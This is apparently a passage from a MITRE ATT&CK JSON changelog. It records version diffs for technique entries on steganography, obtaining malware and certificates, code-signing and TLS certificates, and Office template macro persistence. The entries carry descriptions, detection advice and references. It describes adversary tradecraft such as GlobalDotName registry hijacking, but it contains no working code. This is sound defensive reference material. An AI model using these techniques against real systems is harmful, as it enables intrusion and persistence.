| > | d Network Level Authentication for Remote Desktop Services.( | > | Transfer Protocol (HTTP) and Simple Authentication Security | ||
| > | Citation: TechNet Blogs Credential Protection) | > | Layer (SASL) exchanges.(Citation: TechNet Blogs Credential | ||
| > | Protection) * Kerberos: Preferred for mutual client-server d | ||||
| > | omain authentication in Windows 2000 and later. * CredSSP: | ||||
| > | Provides SSO and Network Level Authentication for Remote Des | ||||
| > | ktop Services.(Citation: TechNet Blogs Credential Protection | ||||
| > | ) |
Invoke-PSImage\u202fto hide [PowerShell](https://attack.mitre.org/techniques/T1059/001) commands in an image file (.png) and execute the code on a victim's system. In this particular case the [PowerShell](https://attack.mitre.org/techniques/T1059/001) code downloaded another obfuscated script to gather intelligence from the victim's machine and communicate it back to the adversary.(Citation: McAfee Malicious Doc Targets Pyeongchang Olympics) ",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "defense-evasion"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1027/003",
"external_id": "T1027.003"
},
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/636.html",
"external_id": "CAPEC-636"
},
{
"source_name": "Wikipedia Duqu",
"description": "Wikipedia. (2017, December 29). Duqu. Retrieved April 10, 2018.",
"url": "https://en.wikipedia.org/wiki/Duqu"
},
{
"source_name": "McAfee Malicious Doc Targets Pyeongchang Olympics",
"description": "Saavedra-Morales, J., Sherstobitoff, R. (2018, January 6). Malicious Document Targets Pyeongchang Olympics. Retrieved April 10, 2018.",
"url": "https://securingtomorrow.mcafee.com/mcafee-labs/malicious-document-targets-pyeongchang-olympics/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"File: File Metadata"
],
"x_mitre_detection": "Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"Linux",
"macOS",
"Windows"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-15 16:46:56.760000+00:00\", \"old_value\": \"2020-09-16 19:24:20.350000+00:00\"}, \"root['x_mitre_data_sources'][0]\": {\"new_value\": \"File: File Metadata\", \"old_value\": \"File: File Content\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings or other signatures left in system artifacts related to decoding steganography.\", \"old_value\": \"Detection of steganography is difficult unless artifacts are left behind by the obfuscation process that are detectable with a known signature. Look for strings are other signatures left in system artifacts related to decoding steganography.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"changelog_mitigations": {
"shared": [],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0022: File (File Metadata)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-01 01:56:24.776000+00:00",
"modified": "2021-10-18 12:26:22.831000+00:00",
"name": "Obtain Capabilities",
"description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "resource-development"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1588",
"external_id": "T1588"
},
{
"source_name": "NationsBuying",
"description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.",
"url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html"
},
{
"source_name": "PegasusCitizenLab",
"description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group\u2019s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.",
"url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/"
},
{
"source_name": "DiginotarCompromise",
"description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.",
"url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/"
},
{
"source_name": "FireEyeSupplyChain",
"description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.",
"url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop"
},
{
"source_name": "Analyzing CS Dec 2020",
"description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.",
"url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/"
},
{
"source_name": "Splunk Kovar Certificates 2017",
"description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.",
"url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"
},
{
"source_name": "Recorded Future Beacon Certificates",
"description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.",
"url": "https://www.recordedfuture.com/cobalt-strike-servers/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Malware Repository: Malware Metadata",
"Malware Repository: Malware Content",
"Certificate: Certificate Registration",
"Internet Scan: Response Content"
],
"x_mitre_detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.",
"x_mitre_is_subtechnique": false,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Malware Repository: Malware Metadata\", \"Malware Repository: Malware Content\", \"Certificate: Certificate Registration\", \"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-18 12:26:22.831000+00:00\", \"old_value\": \"2021-04-15 03:15:21.193000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\\n\\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\\n\\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.\", \"old_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,5 @@\\n+Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\\n+\\n+Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\\n+\\n Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}, \"iterable_item_added\": {\"root['external_references'][4]\": {\"source_name\": \"FireEyeSupplyChain\", \"description\": \"FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.\", \"url\": \"https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop\"}, \"root['external_references'][5]\": {\"source_name\": \"Analyzing CS Dec 2020\", \"description\": \"Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.\", \"url\": \"https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/\"}, \"root['external_references'][6]\": {\"source_name\": \"Splunk Kovar Certificates 2017\", \"description\": \"Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.\", \"url\": \"https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html\"}, \"root['external_references'][7]\": {\"source_name\": \"Recorded Future Beacon Certificates\", \"description\": \"Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.\", \"url\": \"https://www.recordedfuture.com/cobalt-strike-servers/\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0004: Malware Repository (Malware Content)",
"DS0004: Malware Repository (Malware Metadata)",
"DS0035: Internet Scan (Response Content)",
"DS0037: Certificate (Certificate Registration)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--e7cbc1de-1f79-48ee-abfd-da1241c65a15",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-01 02:11:47.237000+00:00",
"modified": "2021-10-17 16:19:50.018000+00:00",
"name": "Code Signing Certificates",
"description": "Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "resource-development"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1588/003",
"external_id": "T1588.003"
},
{
"source_name": "Wikipedia Code Signing",
"description": "Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.",
"url": "https://en.wikipedia.org/wiki/Code_signing"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Malware Repository: Malware Metadata"
],
"x_mitre_detection": "Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.1",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Malware Repository: Malware Metadata\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-17 16:19:50.018000+00:00\", \"old_value\": \"2021-04-15 03:13:16.259000+00:00\"}, \"root['x_mitre_detection']\": {\"new_value\": \"Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\\n\\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).\", \"old_value\": \"Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).\", \"diff\": \"--- \\n+++ \\n@@ -1 +1,3 @@\\n+Consider analyzing code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, common name, and certificate authority. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in procuring code signing certificates.\\n+\\n Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).\"}, \"root['x_mitre_version']\": {\"new_value\": \"1.1\", \"old_value\": \"1.0\"}}}",
"previous_version": "1.0",
"version_change": "1.0 \u2192 1.1",
"changelog_mitigations": {
"shared": [
"M1056: Pre-compromise"
],
"new": [],
"dropped": []
},
"changelog_detections": {
"shared": [],
"new": [
"DS0004: Malware Repository (Malware Metadata)"
],
"dropped": []
}
},
{
"type": "attack-pattern",
"id": "attack-pattern--19401639-28d0-4c3c-adcc-bc2ba22f6421",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"created": "2020-10-01 02:14:18.044000+00:00",
"modified": "2021-10-16 17:44:09.486000+00:00",
"name": "Digital Certificates",
"description": "Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\n\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\n\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\n\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "resource-development"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1588/004",
"external_id": "T1588.004"
},
{
"source_name": "DiginotarCompromise",
"description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.",
"url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/"
},
{
"source_name": "Let's Encrypt FAQ",
"description": "Let's Encrypt. (2020, April 23). Let's Encrypt FAQ. Retrieved October 15, 2020.",
"url": "https://letsencrypt.org/docs/faq/"
},
{
"source_name": "Splunk Kovar Certificates 2017",
"description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.",
"url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html"
},
{
"source_name": "Recorded Future Beacon Certificates",
"description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.",
"url": "https://www.recordedfuture.com/cobalt-strike-servers/"
}
],
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"x_mitre_data_sources": [
"Certificate: Certificate Registration",
"Internet Scan: Response Content"
],
"x_mitre_detection": "Consider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nDetection efforts may be focused on related behaviors, such as [Web Protocols](https://attack.mitre.org/techniques/T1071/001), [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002), and/or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
"x_mitre_is_subtechnique": true,
"x_mitre_platforms": [
"PRE"
],
"x_mitre_version": "1.2",
"detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_data_sources']\": [\"Certificate: Certificate Registration\", \"Internet Scan: Response Content\"]}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2021-10-16 17:44:09.486000+00:00\", \"old_value\": \"2021-04-15 02:32:49.507000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\\n\\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\\n\\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\\n\\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.\", \"old_value\": \"Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\\n\\nAdversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\\n\\nCertificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\\n\\nAfter obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.\", \"diff\": \"--- \\n+++ \\n@@ -1,6 +1,6 @@\\n Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.\\n \\n-Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Man-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\\n+Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.\\n \\n Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)\\n \"}, \"root['x_mitre_version']\": {\"new_value\": \"1.2\", \"old_value\": \"1.1\"}}}",
"previous_version": "1.1",
"version_change": "1.1 \u2192 1.2",
"description_change_table": "\n | Old Description | New Description | ||||
|---|---|---|---|---|---|
| t | 1 | Adversaries may buy and/or steal SSL/TLS certificates that c | t | 1 | Adversaries may buy and/or steal SSL/TLS certificates that c |
| > | an be used during targeting. SSL/TLS certificates are design | > | an be used during targeting. SSL/TLS certificates are design | ||
| > | ed to instill trust. They include information about the key, | > | ed to instill trust. They include information about the key, | ||
| > | information about its owner's identity, and the digital sig | > | information about its owner's identity, and the digital sig | ||
| > | nature of an entity that has verified the certificate's cont | > | nature of an entity that has verified the certificate's cont | ||
| > | ents are correct. If the signature is valid, and the person | > | ents are correct. If the signature is valid, and the person | ||
| > | examining the certificate trusts the signer, then they know | > | examining the certificate trusts the signer, then they know | ||
| > | they can use that key to communicate with its owner. Advers | > | they can use that key to communicate with its owner. Advers | ||
| > | aries may purchase or steal SSL/TLS certificates to further | > | aries may purchase or steal SSL/TLS certificates to further | ||
| > | their operations, such as encrypting C2 traffic (ex: [Asymme | > | their operations, such as encrypting C2 traffic (ex: [Asymme | ||
| > | tric Cryptography](https://attack.mitre.org/techniques/T1573 | > | tric Cryptography](https://attack.mitre.org/techniques/T1573 | ||
| > | /002) with [Web Protocols](https://attack.mitre.org/techniqu | > | /002) with [Web Protocols](https://attack.mitre.org/techniqu | ||
| > | es/T1071/001)) or even enabling [Man-in-the-Middle](https:// | > | es/T1071/001)) or even enabling [Adversary-in-the-Middle](ht | ||
| > | attack.mitre.org/techniques/T1557) if the certificate is tru | > | tps://attack.mitre.org/techniques/T1557) if the certificate | ||
| > | sted or otherwise added to the root of trust (i.e. [Install | > | is trusted or otherwise added to the root of trust (i.e. [In | ||
| > | Root Certificate](https://attack.mitre.org/techniques/T1553/ | > | stall Root Certificate](https://attack.mitre.org/techniques/ | ||
| > | 004)). The purchase of digital certificates may be done usin | > | T1553/004)). The purchase of digital certificates may be don | ||
| > | g a front organization or using information stolen from a pr | > | e using a front organization or using information stolen fro | ||
| > | eviously compromised entity that allows the adversary to val | > | m a previously compromised entity that allows the adversary | ||
| > | idate to a certificate provider as that entity. Adversaries | > | to validate to a certificate provider as that entity. Advers | ||
| > | may also steal certificate materials directly from a comprom | > | aries may also steal certificate materials directly from a c | ||
| > | ised third-party, including from certificate authorities.(Ci | > | ompromised third-party, including from certificate authoriti | ||
| > | tation: DiginotarCompromise) Adversaries may register or hij | > | es.(Citation: DiginotarCompromise) Adversaries may register | ||
| > | ack domains that they will later purchase an SSL/TLS certifi | > | or hijack domains that they will later purchase an SSL/TLS c | ||
| > | cate for. Certificate authorities exist that allow adversar | > | ertificate for. Certificate authorities exist that allow ad | ||
| > | ies to acquire SSL/TLS certificates, such as domain validati | > | versaries to acquire SSL/TLS certificates, such as domain va | ||
| > | on certificates, for free.(Citation: Let's Encrypt FAQ) Aft | > | lidation certificates, for free.(Citation: Let's Encrypt FAQ | ||
| > | er obtaining a digital certificate, an adversary may then in | > | ) After obtaining a digital certificate, an adversary may t | ||
| > | stall that certificate (see [Install Digital Certificate](ht | > | hen install that certificate (see [Install Digital Certifica | ||
| > | tps://attack.mitre.org/techniques/T1608/003)) on infrastruct | > | te](https://attack.mitre.org/techniques/T1608/003)) on infra | ||
| > | ure under their control. | > | structure under their control. |
C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Templates\\Normal.dotm\n\nExcel Personal.xlsb location:C:\\Users\\<username>\\AppData\\Roaming\\Microsoft\\Excel\\XLSTART\\PERSONAL.XLSB\n\nAdversaries may also change the location of the base template to point to their own by hijacking the application's search order, e.g. Word 2016 will first look for Normal.dotm under C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\, or by modifying the GlobalDotName registry key. By modifying the GlobalDotName registry key an adversary can specify an arbitrary location, file name, and file extension to use for the template that will be loaded on application startup. To abuse GlobalDotName, adversaries may first need to register the template as a trusted document or place it in a trusted location.(Citation: GlobalDotName Jun 2019) \n\nAn adversary may need to enable macros to execute unrestricted depending on the system or enterprise security policy on use of macros.",
"kill_chain_phases": [
{
"kill_chain_name": "mitre-attack",
"phase_name": "persistence"
}
],
"revoked": false,
"external_references": [
{
"source_name": "mitre-attack",
"url": "https://attack.mitre.org/techniques/T1137/001",
"external_id": "T1137.001"
},
{
"source_name": "Microsoft Change Normal Template",
"description": "Microsoft. (n.d.). Change the Normal template (Normal.dotm). Retrieved July 3, 2017.",
"url": "https://support.office.com/article/Change-the-Normal-template-Normal-dotm-06de294b-d216-47f6-ab77-ccb5166f98ea"
},
{
"source_name": "MSDN VBA in Office",
"description": "Austin, J. (2017, June 6). Getting Started with VBA in Office. Retrieved July 3, 2017.",
"url": "https://msdn.microsoft.com/en-us/vba/office-shared-vba/articles/getting-started-with-vba-in-office"
},
{
"source_name": "enigma0x3 normal.dotm",
"description": "Nelson, M. (2014, January 23). Maintaining Access with normal.dotm. Retrieved July 3, 2017.",
"url": "https://enigma0x3.net/2014/01/23/maintaining-access-with-normal-dotm/comment-page-1/"
},
{
"source_name": "Hexacorn Office Template Macros",
